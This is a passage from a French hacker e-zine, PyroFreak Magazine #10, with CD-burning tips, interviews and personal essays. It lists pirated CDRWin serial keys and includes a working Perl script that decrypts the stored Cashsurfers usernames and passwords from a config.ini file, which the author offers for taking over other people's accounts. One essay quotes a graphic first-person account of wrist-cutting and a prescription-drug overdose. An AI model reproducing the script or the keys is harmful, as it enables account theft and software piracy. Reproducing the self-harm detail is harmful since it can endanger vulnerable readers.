        Overburn, signifie Graver plus loin'. Ce qui signifie que l'on
        pourrait, en pratique, grav plus de 74 minute sur un Cd de 74 minutes.
        Non, pas beaucoup, mais lorsque vous avez du ISO de 74m30s ou de 75min,
        le procd de l'overburnage peut vous viter de devoire utiliser un cd
        de 80 minutes (plus coteux que les cd Habituel de 74 min.)

        Est-ce que tout le monde peuvent Overburner? la rponse est malheureu-
        sement 'non'. Pour overburner, il vous faut runire 3 lments.

        1) Un logiciel qui accepte l'Overburn..
        Ne pensez pas overburner avec Adaptec Eazy CD creator, il refusera,
        pensant bien faire, en prtendant que le CD est trop petit pour contenir
        les informations que vous voulez y mettre, il a thoriquement raison.
        Si vous dsirez overburner, vous devrez vous servire d'unl ogiciel un
        peut moin friendly. Dans mon cas, je me sert de CDr-Win 3.7f.

        2) Vous devez vous servire de CDs dont la zone de gravure est
                thoriquement lgrement plus grande que 74 minute..
        Les maxell fonctionne trs bien selon moi, mais il y en a surement
        plusieur autres.

        3) Il vous faut un graveur acceptant de grav plsu loin de 74 min..
        Ce n'est pas tout les graveurs qui accepte de grav plus loin que 74
        minutes.

        Comment savoir si votre graveur accepte l'overburning? Testez est le seul
        moyen. Trouvez vous un Iso dont la taille est 'LGREMENT' plus longue
        que 74 min. (Prenez par exemple, le 4e CD de Final Fantazy 8). Si vous
        russissez  le grav adquatement et que le rsultat est une russite.
        Cela signifiera donc que votre Graveur Peut Overburner.

CDr-Win version 3.8a:

        Oui, la version 3.8a de CDr-win est sortie, mais je n'ai pas entendu de
        trs bon commentaire  son propos. si votre 3.7f fonctionne corectement,
        je vous sugre de continuer a vous en servire =)

Serial Protect de CDr-win:

        Comme vous l'avez sans doute remarquer, CDr-win est protg  l'aide d'un
        serial Number. Mais saviez vous que lorsque vous entrez un movais s/n,
        Cdr-win va l'accept, mais fera dlibrment manquer vos Cds? Alors si
        vous avez de srieux problme de CDs, essayez donc de le rinstaller.

        Voici une liste de s/n valide pour diverse version de CDr-win:

        CDr-Win v3.4b
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  0c9bba46-7c2a120e-fbd0f925-fdb3b3fd
                Chek Code:  f12809bb-70b1a848-87faeb2b-06634ad8
        CDr-Win v3.5a
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  0C9BA8FA-7C2A120E-2336F92E-FDB3B3FD
                Chek Code:  F1281B07-70B1BAF4-5F1CEB20-DE854AD3
        CDr-Win v3.7a
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  0C9BED9D-7C2A120E-4D29F915-FDB3B3FD
                Chek Code:  F1285E60-70B1FF93-3103EB1B-B09A4AE8
        CDr-Win v3.7b
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  0C9BED9D-7C2A120E-4D29F914-FDB3B3FD
                Chek Code:  F1285E60-70B1FF93-3103EB1A-B09A4AE9
        CDr-Win v3.7c
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  0C9B15F4-600893EB-4D29F902-FDB3B3FD
                Chek Code:  F128A609-6C93861F-2D216AE9-B09A4AFF
        CDr-Win v3.7E
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  C9BED9D-7C2A120E-4D29F919-FDB3B3FD
                Chek Code:  F1285E60-70B1FF93-3103EB17-B09A4AE4
        CDr-Win vg3.7f
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  C9BED9D-7C2A120E-4D29F91F-FDB3B3FD
                Chek Code:  F1285E60-70B1FF93-3103EB11-B09A4AE2
        CDr-Win v3.8a
                Name:  pyrofreak
                Company:  pyrofreak
                KeyCode:  B88F057E-F97FB637-4D29F90B-FDB3B3FD
                Chek Code:  453CB683-41F0B349-B4564F3C-B09A4AF6

Bootable CDs:

        Un CD boutable, vous connaissez? Si vous avez dja essay linux, vous
        devez savoire de quoi je parle, Un cd Bootable est l'quibalent d'une
        disquette de dmarrage, mais sur un CD. Pour se servire d'un Cd bootable,
        vous devez all dans le BIOS de votre Machine et modifier la valeur vis--vis
        'Booting Order' qui est probablement 'A,C'. Modifiez le pour "Cd-rom,C". Cela
        fera que lorsque vous ouvrez votre ordinateur, il essera dabord  de boot sur
        le CD dans votre CD-rom. si le Cd prsent dans le Cd-rom n'est pas un Cd
        bootable, ou qu'aucun Cd n'est prsent dans le lecteur CD, il bootera
        simplement sur votre disqueDure C.

        L'utilit de Boot sur un CD?
        Pour linux par exemple, le Cd d'installation est un Cd boutable servant 
        format et install linux sur votre disque dure (Qui est probablement format
        en DOS). Une autre utilisation est celle de restorer votre Hd avec un backup
        en cas de malchance. Vous bootez sur le Cd et formatez votre disque, puis
        copier une image prcdamment fait de votre disque Dure. Ce principe vite
        de devoir toujour tout rinstall manuellement  chaque formattage. Si vous
        usez un peut de votre imagination, je suis certain que vous en trouverez une
        tonne d'autre utilits.

        Vous pouvez cr un Cd boutable  l'aide du logiciel Adaptec Eazy Cd creator 4..

        Dans l'arboressance du Cd en bas.. cliquer la o c'Est crit le nom de volume
        du cd que vous all cr, cliquez dessus avec le bouton droit, Allez sur
        'New, Bootable CD' Eazy CD Creator va vous demand d'insr une disquette de
        dmarage dans Votre lecteur A, pour qu'il puisse all y cherch les command.com
        et compagnie.

Jitter Error de CDr-win:

        L'autre jour, j'ai essay de grav un cd  l'aide de CDr-win 3.7f,  ma grande
        surprise,  chaque tantative de cration de l'image du Cd sur mon Hd, le logiciel
        me donnais une erreur: "Jitter Error" J'ai essay plusieur fois de changer les
        diffrants options, sans rsultat. J'ai finalement russit ma copie avec facilit
         l'aide du CD copier de Adaptec Eazy Cd creator 4. Les CDs qui me causent se
        problme sont les suivant: RailRoad Tycoon, RainBow Six. Si vous savez comment
        les copier avec CDr-Win, Envoyez moi un Email. Mais d'aprs moi, il s'agit
        d'une protection sur le CD. Je vous tiendrai au courant si j'ai des nouvelle
        sur le sujet.

Protectoin des CDs:

        Votre ami vous a prt son super jeu pour le Week-end et vous dsirez vous en
        faire une copie. Je vous suggre donc le site: http://www.gamecopyworld.com/
        Vous y slectionnez le jeu que vousdsirez copier et vous avez tout les
        information ncssaire sur la copy de cd Jeu. Plutt pratique comme site =)


J'achve donc cette 3e Partie de 'ISO \\'aReZ & MP3' en vous souhaitant bonne chance
avec tout ce que je vous ai parl dans cette arcticle et si vous avez des question
ou des commentaire  me pos  propos du gravage des CDs ou tout autres sujet que
j'ai abord dans cette suite d'arcticles, n'sitez pas! E-mailez moi =)

                Vip0|a  -=-->  Vipola@pyrofreak.org


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 25-Decryptage des comptes de Cashsurfers
|( ) Phreak (X) Hack ( ) Autres
'.__________Par zorgon________  _______zorgon@sdf.lonestar.org ____ ___


Vous connaissez certainement le systeme de baniere publicitaire
qui s'affiche sur votre bureau en echange de quoi, 
vous gagnez de l'argent tout en surfant. Pour ca, il faut creer 
un compte sur un serveur. Ce compte vous permet de verifier
votre nombre de points, de modifier les renseignements de 
votre compte ...

Il existe un serveur particulierement interessant qui est 
Cashsurfers (http://www.cashsurfers.com). Vous creez un compte 
chez eux et en retour il vous propose de downloader une 
banniere que vous installerez.Rien de plus banal.
 
Mais c'est la que ca devient interessant. Allez dans le 
repertoire d'installation, vous trouverez un 
config.ini ou le username et le passwd sont cryptes, et le probleme
c'est qu'il n'y a pas grande difficulte a les decryptes.

Je vous ai donc ecrit un script qui va faire ca pour vous. Il n'est
peut-etre pas optimise mais il fonctionne.
Reste plus qu'a recuperez un fichier config.ini, mais pour ca je 
vous fais confiance :-)

------- cut -----------------------------


#!/usr/bin/perl -w
#-----------------------------------------------
# 
# Cashsurfers script http://www.cashsurfers.com
# by zorgon <zorgon@sdf.lonestar.org>
#
#------------------------------------------------

@cle_user = (14,24,5,12);
@cle_pass = (3,5,3,10);
@alpha = ('a'..'z');

$file = $ARGV[0];
&usage() if (!defined($file));

open(INI,"$file") || die "Can't open file $file: $!";
while(<INI>){
    if(/^Username/){
	($etiq,$user) = split(/\=/);
	chomp($user);
    }
    if(/^Password/){
	($etiq,$pass) = split(/\=/);
	chomp($pass);
    }
}
close(INI);

&decrypt_user($user);
&decrypt_pass($pass);

#------------------------------
# Decryptage du username
#------------------------------
sub decrypt_user {
    my($username)=@_;

    $lguser=length($username);
    $nbcar=$lguser/3;

    $j=0;
    for($i=0;$i<$lguser;$i+=3){
	$tmp[$j]=substr($username,$i,3);
	$crypt[$j] = $tmp[$j]-200;
	$j+=1;
    }

    $j=0;
    for($i=0;$i<$nbcar;$i+=1){
	$j=0 if($j==4);
	if($crypt[$i]<$cle_user[$j]){
	    $crypt[$i] -= $cle_user[$j]-26;
	}
	else{
	    $crypt[$i] -= $cle_user[$j];
	}
	$j += 1;
    }

    print "Username : ";
    foreach $val (@crypt){
	print "$alpha[$val-1]";
    }
    print "\n";
}

#------------------------------
# Decryptage du password
#------------------------------
sub decrypt_pass {
    my($password)=@_;

    $lguser=length($password);
    $nbcar=$lguser/3;

    $j=0;
    for($i=0;$i<$lguser;$i+=3){
	$tmp[$j]=substr($password,$i,3);
	$crypt[$j] = $tmp[$j]-100;
	$j+=1;
    }
    
    foreach $val (@crypt){
	$left = substr($val,0,1);
	$right = substr($val,1,1);
	$val=$left+$right;
    }

    $j=0;
    for($i=0;$i<$nbcar;$i+=1){
	$j=0 if($j==4);
	if($crypt[$i]<$cle_pass[$j]){
	    $crypt[$i] -= $cle_pass[$j]-9;
	}
	else{
	    $crypt[$i] -= $cle_pass[$j];
	}
	$j += 1;
    }

    print "Password : ";
    foreach $val (@crypt){
	print "$val";
    }
    print "\n";

}

sub usage {
    print "Usage: excash.pl <config.ini>\n";
    exit 1;
}

0;

-------- cut ------------------

Si l'algorithme de decryptage s'avere faux, envoyez-moi un mail
a: zorgon@sdf.lonestar.org

Ciao!!

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 26-Un peu de tout et de rien mais sourtout de moi...
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Endrix________  ________  fbasoft@yahoo.com ______ ___


-+ Ceci marque mon retour  PyroFreak  ct de mon compatriote, Neuro.


Comme vous avez surement entendu, je suis de retour avec PyroFreak pour
aider et dveloppement du groupe que moi ainsi que Neuro  avons  partis
et mon but ne sera pas d'essayer de prendre le controle   du groupe  de
plus  connus du Qubec mais bien d'amliorer la qualit de nos produits
informatique   et  de  nous diriger vers une sortie qui pourrait rendre
PyroFreak unique dans sont genre sois pour le  Hacking/Coding/Phreaking
et autres..

Cet       article   ne sera pas sur l'informatique mais bien sur moi...
Probablement que tout le monde s'en fou mais je suis sur que  les   bon
lecteurs de ce zine vont bien lire ca et probablement(je l'espre bien)
de donner quelques commentaires et suggestions pour pourront   sois  me
faire plaisir pour plus me rediriger vers une direction  meilleur  pour
faire place  l'amlioration.

Comme rsolutions de l'ans 2000 :

- Faire de meilleurs programmes et plus complet
- Dvelopper une section Linux pour faire place  la programmation,
   l'explication de distribution, window manager, de kernel....
- Me faire un serveur sur modem cable avec plusieurs distributions
  (slackware, redhat, openbsd, beos, debian...) pour cre certains bugs
  voullus et faire des concours de scurit informatique
- Installer une systme de VMB pour laiss les intresss  plus
  comprendre ce genre de chose
- Et... d'tre dison plus heureux dans la vie de tout les jours....


Vous savez que.. Les dernires annes ont t plutt difficile pour moi
ainsi que pour d'autres. On a tous nos priodes dans la vie  ou  on   a
envit de tout laiss tomber, dcrocher de la vie  et  tout   abandonn.
J'ai fallis le faire mais aprs y avoir bien pens,   j'ai   trouv  ca
stupide le fait qu'il y ai du monde qui s'enlve la vie  cause  de  la
socit d'aujourd'hui ou leur style de vie mais coutez,  on   ne  peut
rien y faire, nous somme  l'anne 2000 et demain on va tre   en  2000
aussi alors il ne faut pas ce blmer sur le fait       que   le   monde
d'aujourd'hui est de la merde.. Il faut aider au dveloppement  montrer
qu'on est plus fort que tout et que rien peut nous arrtez...

Nous sommes du monde intelligent alors serons-nous en umpeu   pour  une
fois...

Il vous ai dj arriv d'tre intimid par quelqu'un? Hey bien moi  oui
et dison que j'ai vraiment pas aim ca.. Comparons la personne  la vie.
Cette personne m'a fait crissement chier et qu'est-ce que je peux faire?

1- M'enfuire dans ma chambre, pleur et ne rien faire
2- Prendre le controle et changer ca... Plus jamais je ne vais me faire
   avoir

Hey bien, au dbut, j'ai choisis le #1 ... Peut'tre par  paresse  mais
coutez, quand ca va mal, ca va mal! Il y a un bout que dans les partys,
avec 12bires et un 13oz dans le corps avant j'avais du fun,   LETS  GO
PARTYYYYYY!!!!!!!! Mais j'ai perdu gout  ca.. Et  pendant   ce  temps,
j'aimais mieu aller m'isoller dans une pice et... Pleur sur la  merde
que j'ai eu toute ces annes, j'tait tellement dcourag     que  j'en
pleurais.. j'avais plus de fun  vivre, je  m'isolais,     mes  parents
capotaient, mes amis(es) voullaient m'aider mais rien tait  la hauteur
parce que prendre une dcision  coeur, il faut   que   ca   vienne  de
l'intrieur et non de l'extrieur. Le psy lui ne fait  que    dcouvrir
qu'est-ce que le problme est mais merde, il faut     que  la  dcision
vienne de toi c'est comme pour arrter de fumer.... Alors un  jour  jme
suis dit... Merde jme suis laiss coeur par cet enfoir de  merde  et
j'ai fait rire de moi. Qu'est-ce que j'ai fait? Je suis  all  le  voir
pendant que ces amis taient avec lui et je lui ai dit   ma   facon  de
pens il voullait me tuer mais.... Il n'a rien fait parce que j'en suis
sur que dans un sens il s'est dit que j'avais eu beaucoup   de  courage
pour faire ca et finnallement il n'a rien fait. c'est comme la vie,  tu
peux pas te laiss avoir par cette putain de socit de merde  il  faut
que ta prsence serve  quelque chose, alors la je suis  venu   ici  et
j'ai crit de texte. Je sais que c'est pas facile   passer  au  travers
d'une priode que j'ai pass mais si je l'ai fait, tout  le  monde  est
capable.


Je vais vous faire lire un extrs de F.U.C.K. (Fucked Up College Kids)
qui parle de suicide et qui est vraiment mais vraiment bon.

=================================================================================
=================================================================================
I am dead. I am breathing, but I feel no life. I sit and ask
myself all the questions I can never truthfully answer. "Why
can't I just be happy?" "Why do people treat me so fucked
up?" "Why do I feel like dieing?"...

Truth is, I  don't feel like dieing. I feel like
living...happily. In peace. But since I can't, I want to end
it. I will end it. I must.

I looked at the razor blade sitting on top of my stereo. I
stared at it as if I was obsessively in love with it and what
it is capable of. I started crying, I threw the phone that
was in my hand. It hit the wall  so hard, one off the pieces
flew back and hit my eye. That pissed me the fuck off. I
looked at the blade again, and decided to do it. Cut.

I grabbed the blade, and wiped it off...I looked at my wrist
and scratched my wrist as hard as possible. It turned red.
Bright red. I started to cut, I slowly cut about an inch
long....no where near the vein. Then I realized I didn't want
to die. I wanted a scar, a physical scar, to show for my
emotional ones. I decided to cut again, this time I was
closer  to my vein, I looked at the blood come out. I felt
good. I felt like I was invincible. The phone rang. My ex,
telling me how I felt again.

Why do people automatically  assume just because THEY are ok,
that I must be too. He keeps telling me I am ok, that I don't
want to die. That I won't. That he will stop me. It made me
wanna do it more. I hung up...blade still in hand, and cut my
other wrist again, right on my vein. I just watched the blood
ooze out, it seemed so...so peaceful. I felt relieved. I
licked my wrist, and tasted my blood. It was sweet. Sweetest
thing I ever tasted. Kinda sick, huh? No. It was beautiful.
That I felt so dead, yet so alive. I felt so much pain, yet
so much warmth.

I was listening to the SneakerPimps. Her voice hypnotized
me. I felt like I  wanted to be the beat, her voice caressing
me. I decided that since I couldn't do that, I didn't want to
do anything else. I went to my dresser, still bleeding, and
reached for my trusty bottle of prozac. I took out 7 pills.
All that was left. I took them all. I went to the bathroom,
and took 4 or 5 codeine, I can't really remember, since I
felt completely numb and dizzy.

Next thing I remember doing is laying down on my cold floor.
Completely intoxicated by the music.

I woke up the next morning, feeling very very sick. I threw
up about 5 times. I went back to my room, and looked at the
floor. I saw blood all over, and a piece of paper right by
it. I picked it up, and unfolded it. It said...
 "You did the right thing bitch, and if you wake up to see
this, you failed once again. Next try! Sincerely, Your
Mother!"

WHAT THE FUCK!!! I am truly disturbed now. She has done it.
She's lucky she's not here right now. (Keep in mind, this just
happened) How could she say something so cruel to me? I know I
get on her nerves, and sometimes she even feels like killing
me,but damnnn!!!

That's ok though. Because regardless of how bad it hurt to
read that, I know she doesn't mean it. She is saying this
because she knows I will live. She knows I have to. She's
just bringing to my attention what a dumbass I make of myself
when I do dumb shit like that. And it IS true.

Point of this all; so many people inn my life have downed me
for being "suicidal". They tell me I'm crazy, I'm
exaggerating, blah blah blah. The thing is, most people who
TALK about killing themselves, are the ones who are too
fucking scared to actually go thru with it. They just want
attention. They might feel like dieing, and in all actuality
wish they were dead, but they won't do it.

The ones who don't talk about, well they just don't. And
sooner or later, that anger will eat them up, and they will
go thru with it.

But however, I have talked about it many times, telling
people I was going to do it, and I really wanted to. I really
tried. It just failed. And the more people tell me how I
feel, or how things really are, makes me want to prove to
them even more so, just how BAD it is. SO be careful....
=================================================================================
=================================================================================


Umpeu de moi? :) trs bien

J'ai commenc  jouer avec des ordinateurs quand mon pre m'a achet un
commodore 64(le type qui se branchait sur la tv). Je me rappel, mimi la
fourmis et tout les autres jeux, aprs ca j'ai eu un 386 et aprs un 486
et c'est  ce moment que je dcouvert d'autre choses que les jeux.
J'tait jeune et j'avais du fun avec mon msdos avec qbasic :) Tout ce qu'il
me fallait aprs ca tait mon os et mon quickbasic. J'ai mme crit un programme
de gestion que mon cole utilise encore  ce que j'ai entendu.

oh, oh... J'ai entendu parler d'une linus trovalt.. Qui est-ce? Qu'est-ce qu'il fait?
Linux, quel beau systme d'exploitation, slackware et redhat que j'ai commenc. Aprs
Je commence la programmation bash en pdksh pour unix. J'cris des petits scripts qui
rendent mon travail moins long. Je fais du HTML et du design jusqu' 5h le matin tout
le temps. ooo.. quel beau monde :) Mon ordinateur me respecte et je le respecte, il
ne me faire pas chier apart quand j'ai ouvert mon ordi pour la premire fois et j'ai
chapper une fisse sur la motherboard de mon 386... heh mon papa tait pas content :)

Visualbasic... simple et puissant.. Je m'amuse maintenant  crire des programmes
en vb pour le net(port scanner, serveurs[http,ftp,telnet,echo...], les attaquents...)
tout ce qui est possible  faire j'essais de le faire maintenant.

euhh oui j'coute la musique.. Et voici tout les groupes que j'aime :


korn, incubus, green day, nofx, snuff, pennywise, milincolin, system of a down,
bad religion, beastie boys, limp bizkit, techno, weezer, vulgaire machin, reset, rancid,
rage against the machine, prodigy, our lady peace, off springs, lifter, lagwagon,
i mother earth, groovy aardvark, grim skunk, eminem, deftones, cypress hill,
collective saoul, blink 182... euh bon peut'tre que j'en oublis mais c'est apeuprs ca.


Sports :


Ski alpin (ohhh yeahhhh free style skiing !!!! iron-cross 360 aek un grab.. mon meilleur truc:)
Mountain Bike (mouaheh mont-tremblant extrme biking.. free style biking too :)
Escalade intrieur&extrieur (ouais ya une nouvelle place  ottawa qui est super)
euhh... sexe? (yeszer!)
Badminton (mouais jme suis achet une blacknight.. yeahhh i'm a pH33r now!)


Divertissement :

- Scurit informatique (ouin so called computer hacking)
- Phreaking (ouais vous auriez du voir quand on a russit  pogner un tel payant)
- Guitare (1 accoustique et 1 lectrique fender strato aek un 200watts peavy)
- Drum (un mix de westbury et de perl, stun 9 morceaux)
- lectronique (heh ma soeur peu pu rentrer dans ma chambre sinon le systme d'alarme part)
- Potologue (ca se dit? jaime bien le tabac vert)
- alcool (je ne suis qu'un simple dgustateur)
- rave ( en passant mon 12 fvrier a mtl ca va tre fou! looove on the beat)
- dison que j'ai entrer dans les batisses la nuit(cole primaire l'on su en esti!)
- coding :)
- pi ben, jmendure :)


Bon maintenant dans mon prochain zine je vais avoir plus de temps pour prparer mes choses
et je vais faire plus d'article sur la scurit.


-endrix-

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
: 
|27-Les nouvelles en Vrac                                    
'.__________ ______ ______________ _______ ______________________ __ __

Nb de Neuro: Le 3/4 des questions, c'est endrix qui a rpondu, et cette 
fameuse Maire Plourde ne la pas inscrit. Et quelques de nos rponses ont t
quelque peu modifis.



                          Les leons de Neuro
                           Par Marie Plourde
             Le Journal de Montral, Vendredi 18 Fvrier 2000
                                  Page 45


        Sommes-nous en scurit sur le net? Plus les grands sites sont la
cible de hackers, plus la question se pose. Laissez-moi vous prsenter Neuro,
un membre de PyroFreak, groupe de pirates virtuels reconnu sur la scne 
francophone.

Ouf! Neuro communique dans un language facile  comprendre pour le Net twit.
On dit de lui qu'il excelle dans le phreaking, attaque de systemes 
tlphoniques. Il consacre 25 heures par semaine au hacking. Afin de nous
aider  comprendre ce monde, il a accept de subir l'intrrogatoire.



                             La mitraille

Neuro, c'est quoi un hacker?
"Un hacker est une personne capable de comprendre les technologies de 
l'informatique. Ainsi, il prend le contrle de serveurs auxquels il ne
doit pas avoir accs afin d'y apporter des modifications. Souvent il implante
un virus ou encore ce qu,on appelle un "backdoor", porte d'entre secrte,
qui lui donne un accs illimit  l'ordinateur sans avoir  hacker de nouveau.
Normalement, un vrai hacker ne dtruit jam,ais le contenu d'un ordinateur, il
se contente d'utiliser les informations qu'il y trouve  des fins 
personnelles."

Pyrofreak, est-ce une sorte de confrrie?
"Un peu... Certains membres sont trs proches, et ce, mme s'ils habitent
 500 km. Quand arrive quelque chose  l'un d'entre nous, tout le monde le
sait. Cependant, on n'change pas nos secrets et nos connaissances avec
n'importe qui. Nous sommes prudents."

Quel est le but de Pyrofreak?
"Aider la socit  amliorer les technologies informatiques et 
tlphoniques."

Wow! Des Mre Teresa du Net!!! Les hackers ne sont pas tous des enfants de 
coeur. Il y a ceux qui dtruisent les systmes informatiques et les autres
qui s'en servent pour leur bonheur personnel. Neuro se situe dans la
deuxime catgorie.

"Moi, je ne fais jamais de tort . Quand je vois qu'il y a un bogue dans 
l'ordinateur que j'attaque, je l'exploite, mais je ne fais jamais de merde 
la compagnie ou au site web. Aprs j'envoie un courriel pour dire comment je
me suis pris pour faire le hack afin que la compagnie puisse faire les
changements ncessaires pour viter que ce genre de situation ne se
reproduise."

Est-ce votre vrai job?
"Disons que je fais a dans mes temps libres, toutefois certaines compagnies 
m'engagent pour rendre leur site ou leur server plus scuritaire."

         Pyrofreak c'est un groupe de pirates virutels francophones
                          
                            Et la scurit?

Quel regard portez-vous sur le Net?
"Internet est la plus grande rvolution dans le monde de l'lectronique.
Cependant, tout s'est pass trop rapidement. Nul n'tais prt  notre
arrive  nous, les hackers. Chaque jour, il y a des centaines de sites qui 
sont la cible de pirates. Internet est devenu un vritable champ de bataille 
entre la scurit informatique et nous."

Quelles sont les plus belles cibles pour un hacker?
"Les sites les plus populaires d'aprs moi sont Ebay, Yahoo, Altavista, le
site du KKK et de la Maison Blanche. Ils y ont tous pass."

On dit que le service de courriels Hotmail est trs facile a pirater?
"Trs, trs facile! J'appelle mme plus ca du piratage..."

Maintenant, l'ternelle question, sommes-nous en scurit quand on magasine
sur le Net?
"Je ne pense pas. Mon pre paie chaque jour ces comptes par Internet, il
pense que c'est scuritaire. Il n'a pas ide de l'ampleur de la guerre 
virtuelle qui est prsentement en cours..."

D'une certaine facon, n'tes-vous pas les chiens de garde d'internet?
"Comme disait le directeur de la CIE: Les hackers sont essentiels. Ils
trouvent les failles et on n'a mme pas  les payer pour le faire. Je
crois que je n'ai rien  dire de plus", conclut-il.






                          Les nouveaux pirates 
                           Par Marie Plourde
             Le Journal de Montral, Jeudi 17 Fvrier 2000
                                Page 54





Les pirates virtuels ont la cote. Les mdias n'en ont que pour eux, enfin
que pour leurs coups. Ainsi, les attaques loges contre les populaires
sites Yahoo et Amazon et contre le chat public du prsident Clinton ont
fait d'eux de mystrieux personnages. Mais qui sont ces fantmes de
l'opra cachs dans les coulisses du Net ? 

Difficile d'entrer en contact avec les hackers, des personnages pleins de
paradoxes. Ils rvent de devenir les vedettes de leur milieu, de faire 
connatre leur surnom dans le monde, et ce, tout en conservant l'anonymat,
parce qu'tre hacker, c'est tout aussi lgal, dans certains cas, que d'tre
braqueur de banques. 

Comme des voleurs, ils pntrent des lieux sans autorisation, se livrent
parfois au vandalisme et s'emparent de ce qui les branche. Bon, on est loin
des gros messieurs tout de cuir et de tatouages vtus. Et ne se promnent
pas avec des pistolets et des pieds-de-biche non plus. N'empche que le
hacking est considr comme un crime. 

                            Rencontre avec BenCode 

Oui, il est difficile d'entrer en contact avec les hackers, le rpertoire
des pirates anonymes avec adresses et numros de tlphone n'existant pas
encore. Aussi mes premires approches furent plutt dcevantes. Puis il y
a eu BenCode, rigolo personnage de 19 ans qui hacke  temps plein partiel
depuis six ans. 

Malgr sa triste moyenne scolaire de 37 pour cent (il s'ennuie mortellement
 l'cole), il est un vritable technophile capable de vulgariser tout se
qui se passe dans Internet. Ironiquement, il tudie en scurit informatique
. Est-ce pour mieux djouer les compagnies ? Est-ce la tactique du cheval de
Troie ? 

Un peu, oui, mais BenCode est avant tout un autodidacte, comme la majorit
des pirates, et les connaissances qu'il stocke sur le terrain l'aideront
plus tard  dtecter les failles des systmes informatiques. Ne riez pas, 
il pourrait mme en faire un mtier un jour. 

C'est vrai, a prend un hacker pour penser comme un hacker, c'est pourquoi
bien des grandes socits font appel  leurs services, qu'elles paient
chrement. La spcialit de BenCode, noter  pirate , est le carding, soit
la fraude informatique et la scurit rseautique. 

Cependant, il n'est pas vident  comprendre, ce Ben. Il communique dans un
indchiffrable charabia. J'aurais eu besoin du dictionnaire du parfait petit
hacker pour le dcoder. Disons que BenCode, son surnom, est bien choisi. 
Quand je lui ai fait remarquer que son langage tait difficile  suivre,
il m'a simplement rpondu que c'tait juste pour parler plus vite. Exemple : 

 Un hacker travail seul c bin sur, mais il a tjs un appui en arrire au cas
 qu i ay un chiard kelkonc.  

Traduction outremontaise :  Il est bien vident qu'un pirate d'Internet ?
oeuvre de faon solitaire. Cependant, il peut toujours bnficier d'un groupe
d'appui, si bien sr ses oprations tournent mal.  

                             Conseils de Ben 

Fort de ses six annes de bizounage dans le Net, BenCode sait quels piges
attendent les utilisateurs. Selon lui, la scurit des botes de courriels
laisse  dsirer. Il n'y a pas si longtemps, Hotmail, m'a-t-il dit, tait
une vritable passoire. On pouvait lire dans les comptes de tous les usagers.
La situation s'est toutefois amliore depuis, mais ce n'est qu'une question
de temps... 

Ainsi, il recommande, pour les courriels, de s'abonner  des sites qui 
demandent des mots de passe de plus de huit caractres. Il faudrait galement
se mfier des achats par carte de crdit dans le Net, qu'on ne doit faire
seulement que si on est certain que la compagnie a un haut niveau 
d'encryptage des numros.

Venant d'un gars pour qui le hacking est aussi thrillant que le sexe,
j'ai tendance  le croire. 

                        _________________________
                        Branch TV SRC 25 Mars 00
                         Les pirates du tlphone 
  
---------------------------------------------------------------------------
                        Complment d'information


Le phreaker que nous avons interview est membre
d'un groupe de hackers appel Pyrofreak, qui compte
une douzaine de membres et une vingtaine de
collaborateurs. Pyrofreak est surtout connu, dans le
milieu underground, pour ses zines, farcis d'un
humour subversif  souhait.

Le Module des crimes technologiques ne semble pas
avoir de prsence sur le site du Service de police de
la CUM.

Vous trouverez toute la fascinante histoire de Cap'n
Crunch sur son site web. Il n'est pas associ, de prs
ou de loin, avec les dlicieuses crrales Capitaine
Crounche. La frquence de son clbre sifflet, 2600
Hz, explique d'ailleurs pourquoi le nombre 2600 a t
adopt par les premiers phreakers et hackers des
annes 80. C'est mme le titre d'un magazine
spcialis fort instructif.
 un moment dans le reportage, on fait allusion au fait
que, selon certains, les hackers pouvaient tre
considrs comme un service public. Cette ide n'a
pas t mise par un deux de pique. C'est Michael
Jacobs, directeur adjoint de la National Security
Agency, l'agence qui est, entre autres, responsable de
la scurit de l'infrastructure de l'information des
tats-Unis. Dans une entrevue  Wired News, M.
Jacobs explique que par leurs attaques continuelles
sur les rseaux, les hackers mettent le doigt sur des
bobos qu'on ne verrait pas autrement. Et comme
l'conomie mondiale dpend de plus en plus des
rseaux, qu'il importe que l'infrastructure de
l'information soit fiable, les hackers jouent un rle
bnfique, selon lui. 
--------------------------------------------------------------------------

                       Journaliste: Jean-Hugues Roy
                       Ralisatrice: Laurence Dupuis


          Bonjour et bienvenue  Branch. Ici Jean Hugues Roy
          et aujourd'hui on vous parle tout d'abord de ces gens
          disons extrmement talentueux en informatique et
          qu'on appelle les hackers. On va voir donc dans notre
          premier reportage que si la plupart des hackers
          aiment bien travailler au clavier, il y en a aussi que l'on
          appelle en fait les phone phreakers qui aiment plutt
          travailler au combin.

          Personne n'est a l'abri du piratage. Le service de
          politique de la CUM l'a appris l'automne dernier,
          lorsque les boites vocales de 27 de ses dtectives ont
          t violes par un pirate.
            Il a tent diffrents mots de passe jusqu' ce qu'il
          trouve un mot de passe facile, un mot de passe un peu
          par dfaut, l, 1, 2, 3, 4, 5, 6, et puis l, il a cout les
          messages, il a effac un message qui tait destin 
          des enquteurs dans un centre d'enqute.
          Le pirate responsable a t apprhend  la
          mi-janvier, mais d'autres continuent  explorer des
          boites vocales.
            J'appuie sur l'toile pour accder.
          Neuro est un hacker de systme tlphonique, ce
          qu'on appelle en fait un phreaker.
            Je suis dj tomb sur une banque avec un
          systme mal protg.
            Et qu'est-ce qu'il y avait?
            C'est des informations qui s'changeaient que
          j'aurais pu prendre et m'en servir pour des causes
          lucratives.
          L'histoire des phreakers remonte au dbut des
          annes 1970, quand un dnomm John Traper s'est
          rendu compte par hasard qu'un sifflet trouv dans une
          boite de crales Capitaine Crunch avaient
          d'tranges proprits. Le sifflet mettait une tonalit 
          2600 hertz qui, mise dans un combin, permettait de
          faire des appels interurbains gratuitement.

          JACQUES VIAU, coordinateur, Module des crimes
          technologiques, SPCUM
            Moi, je regarde dans l'historique, puis il y a des
          gens qui se branchaient  des appels interurbains 
          l'autre bout du monde, sans savoir mme  qui ils
          parlaient, dans une cabine tlphonique, juste pour
          tre capable de dire: Wow! Je l'ai fait! Je suis
          capable! Et puis de continuer  parler  n'importe qui.
